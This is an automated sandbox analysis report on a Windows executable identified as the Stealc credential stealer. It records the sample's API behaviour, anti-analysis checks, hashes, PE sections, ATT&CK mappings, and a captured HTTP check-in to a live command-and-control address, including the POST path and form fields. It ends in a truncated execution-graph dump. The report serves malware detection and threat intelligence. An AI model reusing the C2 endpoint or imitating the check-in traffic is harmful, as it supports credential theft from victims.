Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B4A60 VirtualProtect 00000000,00000004,00000100,? | 0_2_002B4A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D6390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D6390 mov eax, dword ptr fs:[00000030h] | 0_2_002D6390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002D2A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_002D4610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_002D46A0
Source: file.exe, file.exe, 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_002D2D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_002D1B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002D2A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_002D2C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 13 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpUN | 100% | Avira URL Cloud | malware
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/3 | file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpUN | file.exe, 00000000.00000002.1780359810.00000000011F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php- | file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/J | file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpQ | file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561772
Start date and time: 2024-11-24 09:24:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 18
• Number of non-executed functions: 121
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• VT rate limit hit for: file.exe
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Amadey | 185.215.113.43
                                No context
                                No context
                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.946621712931782
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'762'304 bytes
MD5: cb78b3cf97d74f0540679225a564e8b0
SHA1: 95b72e4eb9f28a6534e1d902f802f2988ad6735f
SHA256: 3427282a0e679abf14880c48f47728c97e1c3f870d1bf3bc0116736f3abde675
SHA512: 88f693df96058aa6f91ba582ce5c213e9c7761eeb1379b8993c4de83b106632083cd90bbd3eba98a4038b6b951adf81f7f64e7bab903eba431ee4497abd5cde6
SSDEEP: 49152:K4sd0B4xleENLXG5uPufXJztveHofL1rAh:AOMl5NLXG5uPuRgof2h
TLSH: E58533A54CB3673BEDC12DB150CA43703FFF329216A9A35D1C4A183E4E532E558A7D2A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa7f000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                 | 0x1000 | 0x249000 | 0x16200 | acdeff952dcac4f7a216279a0236fbe1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x24a000 | 0x2b0 | 0x200 | a4121880cd8bee8db14ecb2b830b71f0 | False | 0.80078125 | data | 5.967797224871212 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 | 0x24c000 | 0x29d000 | 0x200 | 9313f633ed05c18bdbbecb812508ebf1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                hnbmjddz | 0x4e9000 | 0x195000 | 0x194600 | 9d292b575e0ca08a2f538d500fb50bea | False | 0.9948681414219475 | data | 7.954657445334715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fhrijgtr | 0x67e000 | 0x1000 | 0x400 | 6dcf88bb3456eebd4ec4097bcbcec9f3 | False | 0.7041015625 | data | 5.594575094278972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant | 0x67f000 | 0x3000 | 0x2200 | 543e39079f113215197a14e3d847d212 | False | 0.09696691176470588 | DOS executable (COM) | 1.123406194589726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_MANIFEST | 0x67d238 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
                                DLL | Import
                                kernel32.dll | lstrcpy
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-11-24T09:25:06.783371+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 24, 2024 09:25:04.809037924 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Nov 24, 2024 09:25:04.928554058 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Nov 24, 2024 09:25:04.928680897 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Nov 24, 2024 09:25:04.928905010 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Nov 24, 2024 09:25:05.048367023 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Nov 24, 2024 09:25:06.321801901 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Nov 24, 2024 09:25:06.321902037 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Nov 24, 2024 09:25:06.323982000 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Nov 24, 2024 09:25:06.443484068 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Nov 24, 2024 09:25:06.783309937 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                                Nov 24, 2024 09:25:06.783370972 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                Nov 24, 2024 09:25:10.110070944 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                • 185.215.113.206
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7516 | C:\Users\user\Desktop\file.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 24, 2024 09:25:04.928905010 CET | 90 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 24, 2024 09:25:06.321801901 CET | 203 | IN | HTTP/1.1 200 OK
                                Date: Sun, 24 Nov 2024 08:25:06 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 24, 2024 09:25:06.323982000 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 41 36 39 45 39 46 39 38 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a
                                Data Ascii (CRLF line breaks restored from the raw bytes above):
                                ------KFHJJJKKFHIDAAKFBFBF
                                Content-Disposition: form-data; name="hwid"

                                D7A69E9F98841340093196
                                ------KFHJJJKKFHIDAAKFBFBF
                                Content-Disposition: form-data; name="build"

                                mars
                                ------KFHJJJKKFHIDAAKFBFBF--
                                Nov 24, 2024 09:25:06.783309937 CET | 210 | IN | HTTP/1.1 200 OK
                                Date: Sun, 24 Nov 2024 08:25:06 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=
                                Target ID:0
                                Start time:03:25:00
                                Start date:24/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x2b0000
                                File size:1'762'304 bytes
                                MD5 hash:CB78B3CF97D74F0540679225A564E8B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.6%
                                  Total number of Nodes:1405
                                  Total number of Limit Nodes:28
26496 2b3846 26495->26496 26497 2b4a60 2 API calls 26496->26497 26498 2b385c 26497->26498 26499 2b4a60 2 API calls 26498->26499 26500 2b3872 26499->26500 26501 2b4a60 2 API calls 26500->26501 26502 2b3888 26501->26502 26503 2b4a60 2 API calls 26502->26503 26504 2b38a1 26503->26504 26505 2b4a60 2 API calls 26504->26505 26506 2b38b7 26505->26506 26507 2b4a60 2 API calls 26506->26507 26508 2b38cd 26507->26508 26509 2b4a60 2 API calls 26508->26509 26510 2b38e3 26509->26510 26511 2b4a60 2 API calls 26510->26511 26512 2b38f9 26511->26512 26513 2b4a60 2 API calls 26512->26513 26514 2b390f 26513->26514 26515 2b4a60 2 API calls 26514->26515 26516 2b3928 26515->26516 26517 2b4a60 2 API calls 26516->26517 26518 2b393e 26517->26518 26519 2b4a60 2 API calls 26518->26519 26520 2b3954 26519->26520 26521 2b4a60 2 API calls 26520->26521 26522 2b396a 26521->26522 26523 2b4a60 2 API calls 26522->26523 26524 2b3980 26523->26524 26525 2b4a60 2 API calls 26524->26525 26526 2b3996 26525->26526 26527 2b4a60 2 API calls 26526->26527 26528 2b39af 26527->26528 26529 2b4a60 2 API calls 26528->26529 26530 2b39c5 26529->26530 26531 2b4a60 2 API calls 26530->26531 26532 2b39db 26531->26532 26533 2b4a60 2 API calls 26532->26533 26534 2b39f1 26533->26534 26535 2b4a60 2 API calls 26534->26535 26536 2b3a07 26535->26536 26537 2b4a60 2 API calls 26536->26537 26538 2b3a1d 26537->26538 26539 2b4a60 2 API calls 26538->26539 26540 2b3a36 26539->26540 26541 2b4a60 2 API calls 26540->26541 26542 2b3a4c 26541->26542 26543 2b4a60 2 API calls 26542->26543 26544 2b3a62 26543->26544 26545 2b4a60 2 API calls 26544->26545 26546 2b3a78 26545->26546 26547 2b4a60 2 API calls 26546->26547 26548 2b3a8e 26547->26548 26549 2b4a60 2 API calls 26548->26549 26550 2b3aa4 26549->26550 26551 2b4a60 2 API calls 26550->26551 26552 2b3abd 26551->26552 26553 2b4a60 2 API calls 26552->26553 26554 2b3ad3 26553->26554 26555 2b4a60 2 API calls 26554->26555 26556 2b3ae9 26555->26556 26557 2b4a60 2 API calls 26556->26557 26558 2b3aff 
26557->26558 26559 2b4a60 2 API calls 26558->26559 26560 2b3b15 26559->26560 26561 2b4a60 2 API calls 26560->26561 26562 2b3b2b 26561->26562 26563 2b4a60 2 API calls 26562->26563 26564 2b3b44 26563->26564 26565 2b4a60 2 API calls 26564->26565 26566 2b3b5a 26565->26566 26567 2b4a60 2 API calls 26566->26567 26568 2b3b70 26567->26568 26569 2b4a60 2 API calls 26568->26569 26570 2b3b86 26569->26570 26571 2b4a60 2 API calls 26570->26571 26572 2b3b9c 26571->26572 26573 2b4a60 2 API calls 26572->26573 26574 2b3bb2 26573->26574 26575 2b4a60 2 API calls 26574->26575 26576 2b3bcb 26575->26576 26577 2b4a60 2 API calls 26576->26577 26578 2b3be1 26577->26578 26579 2b4a60 2 API calls 26578->26579 26580 2b3bf7 26579->26580 26581 2b4a60 2 API calls 26580->26581 26582 2b3c0d 26581->26582 26583 2b4a60 2 API calls 26582->26583 26584 2b3c23 26583->26584 26585 2b4a60 2 API calls 26584->26585 26586 2b3c39 26585->26586 26587 2b4a60 2 API calls 26586->26587 26588 2b3c52 26587->26588 26589 2b4a60 2 API calls 26588->26589 26590 2b3c68 26589->26590 26591 2b4a60 2 API calls 26590->26591 26592 2b3c7e 26591->26592 26593 2b4a60 2 API calls 26592->26593 26594 2b3c94 26593->26594 26595 2b4a60 2 API calls 26594->26595 26596 2b3caa 26595->26596 26597 2b4a60 2 API calls 26596->26597 26598 2b3cc0 26597->26598 26599 2b4a60 2 API calls 26598->26599 26600 2b3cd9 26599->26600 26601 2b4a60 2 API calls 26600->26601 26602 2b3cef 26601->26602 26603 2b4a60 2 API calls 26602->26603 26604 2b3d05 26603->26604 26605 2b4a60 2 API calls 26604->26605 26606 2b3d1b 26605->26606 26607 2b4a60 2 API calls 26606->26607 26608 2b3d31 26607->26608 26609 2b4a60 2 API calls 26608->26609 26610 2b3d47 26609->26610 26611 2b4a60 2 API calls 26610->26611 26612 2b3d60 26611->26612 26613 2b4a60 2 API calls 26612->26613 26614 2b3d76 26613->26614 26615 2b4a60 2 API calls 26614->26615 26616 2b3d8c 26615->26616 26617 2b4a60 2 API calls 26616->26617 26618 2b3da2 26617->26618 26619 2b4a60 2 API calls 26618->26619 26620 2b3db8 26619->26620 
26621 2b4a60 2 API calls 26620->26621 26622 2b3dce 26621->26622 26623 2b4a60 2 API calls 26622->26623 26624 2b3de7 26623->26624 26625 2b4a60 2 API calls 26624->26625 26626 2b3dfd 26625->26626 26627 2b4a60 2 API calls 26626->26627 26628 2b3e13 26627->26628 26629 2b4a60 2 API calls 26628->26629 26630 2b3e29 26629->26630 26631 2b4a60 2 API calls 26630->26631 26632 2b3e3f 26631->26632 26633 2b4a60 2 API calls 26632->26633 26634 2b3e55 26633->26634 26635 2b4a60 2 API calls 26634->26635 26636 2b3e6e 26635->26636 26637 2b4a60 2 API calls 26636->26637 26638 2b3e84 26637->26638 26639 2b4a60 2 API calls 26638->26639 26640 2b3e9a 26639->26640 26641 2b4a60 2 API calls 26640->26641 26642 2b3eb0 26641->26642 26643 2b4a60 2 API calls 26642->26643 26644 2b3ec6 26643->26644 26645 2b4a60 2 API calls 26644->26645 26646 2b3edc 26645->26646 26647 2b4a60 2 API calls 26646->26647 26648 2b3ef5 26647->26648 26649 2b4a60 2 API calls 26648->26649 26650 2b3f0b 26649->26650 26651 2b4a60 2 API calls 26650->26651 26652 2b3f21 26651->26652 26653 2b4a60 2 API calls 26652->26653 26654 2b3f37 26653->26654 26655 2b4a60 2 API calls 26654->26655 26656 2b3f4d 26655->26656 26657 2b4a60 2 API calls 26656->26657 26658 2b3f63 26657->26658 26659 2b4a60 2 API calls 26658->26659 26660 2b3f7c 26659->26660 26661 2b4a60 2 API calls 26660->26661 26662 2b3f92 26661->26662 26663 2b4a60 2 API calls 26662->26663 26664 2b3fa8 26663->26664 26665 2b4a60 2 API calls 26664->26665 26666 2b3fbe 26665->26666 26667 2b4a60 2 API calls 26666->26667 26668 2b3fd4 26667->26668 26669 2b4a60 2 API calls 26668->26669 26670 2b3fea 26669->26670 26671 2b4a60 2 API calls 26670->26671 26672 2b4003 26671->26672 26673 2b4a60 2 API calls 26672->26673 26674 2b4019 26673->26674 26675 2b4a60 2 API calls 26674->26675 26676 2b402f 26675->26676 26677 2b4a60 2 API calls 26676->26677 26678 2b4045 26677->26678 26679 2b4a60 2 API calls 26678->26679 26680 2b405b 26679->26680 26681 2b4a60 2 API calls 26680->26681 26682 2b4071 26681->26682 26683 2b4a60 2 
